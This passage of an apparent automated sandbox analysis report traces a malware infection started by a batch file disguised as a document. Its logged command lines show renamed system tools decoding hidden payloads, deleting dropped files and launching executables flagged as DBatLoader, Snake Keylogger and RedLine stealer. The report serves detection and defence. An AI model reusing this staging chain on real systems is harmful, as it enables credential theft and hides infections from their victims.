                                                                                                        Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                                                                                        Imagebase:0x7ff7ab120000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:7
                                                                                                        Start time:10:30:25
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\kn.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                                                                                        Imagebase:0x7ff792cf0000
                                                                                                        File size:1'651'712 bytes
                                                                                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:8
                                                                                                        Start time:10:30:27
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
                                                                                                        Imagebase:0x7ff7ab120000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:9
                                                                                                        Start time:10:30:27
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\kn.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
                                                                                                        Imagebase:0x7ff792cf0000
                                                                                                        File size:1'651'712 bytes
                                                                                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:10
                                                                                                        Start time:10:30:27
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1'019'392 bytes
                                                                                                        MD5 hash:46FC1E1BCA07585CF21CC37149F2B424
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000002.1586646546.00000000022F6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.1494549261.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000002.1615024855.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:11
                                                                                                        Start time:10:30:27
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                                                                                        Imagebase:0x7ff7ab120000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:12
                                                                                                        Start time:10:30:28
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
                                                                                                        Imagebase:0x7ff7ab120000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:14
                                                                                                        Start time:10:30:36
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                        Imagebase:0xa40000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:15
                                                                                                        Start time:10:30:36
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:16
                                                                                                        Start time:10:30:36
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Imagebase:0x400000
                                                                                                        File size:175'800 bytes
                                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B61B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000010.00000001.1581941889.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.2757077847.000000002B33B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.2757077847.000000002B33B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B62B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000010.00000002.2726799985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000003.1584508014.000000002991A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000003.1584508014.000000002991A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.2761760799.000000002C591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.2761760799.000000002C591000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 3%, ReversingLabs
                                                                                                        Has exited:false

                                                                                                        Target ID:18
                                                                                                        Start time:10:30:47
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\Libraries\Cneehezx.PIF
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\Public\Libraries\Cneehezx.PIF"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1'019'392 bytes
                                                                                                        MD5 hash:46FC1E1BCA07585CF21CC37149F2B424
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        Has exited:true

                                                                                                        Target ID:20
                                                                                                        Start time:10:30:49
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                        Imagebase:0xa40000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:21
                                                                                                        Start time:10:30:49
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:22
                                                                                                        Start time:10:30:49
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Imagebase:0x400000
                                                                                                        File size:175'800 bytes
                                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032AEA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000016.00000001.1707089110.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032A86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000016.00000002.2757793426.000000003251B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000016.00000002.2757793426.000000003251B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032D67000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032ECC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000016.00000003.1711857093.0000000030AAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000016.00000003.1711857093.0000000030AAE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000016.00000002.2726848233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        Has exited:false

                                                                                                        Target ID:23
                                                                                                        Start time:10:30:55
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\Libraries\Cneehezx.PIF
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\Public\Libraries\Cneehezx.PIF"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1'019'392 bytes
                                                                                                        MD5 hash:46FC1E1BCA07585CF21CC37149F2B424
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Has exited:true

                                                                                                        Target ID:24
                                                                                                        Start time:10:30:56
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                        Imagebase:0xa40000
                                                                                                        File size:236'544 bytes
                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:25
                                                                                                        Start time:10:30:56
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:26
                                                                                                        Start time:10:30:56
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Imagebase:0x7ff7194a0000
                                                                                                        File size:175'800 bytes
                                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.00000000229ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001A.00000002.2726733311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001A.00000001.1780155418.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2756450097.000000002227B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2756450097.000000002227B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.00000000229BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.00000000229B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.0000000022AB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2763742215.0000000023781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2763742215.0000000023781000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000003.1788843721.000000002072D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000003.1788843721.000000002072D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        Has exited:false

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:5.5%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:25.4%
                                                                                                          Total number of Nodes:1411
                                                                                                          Total number of Limit Nodes:28
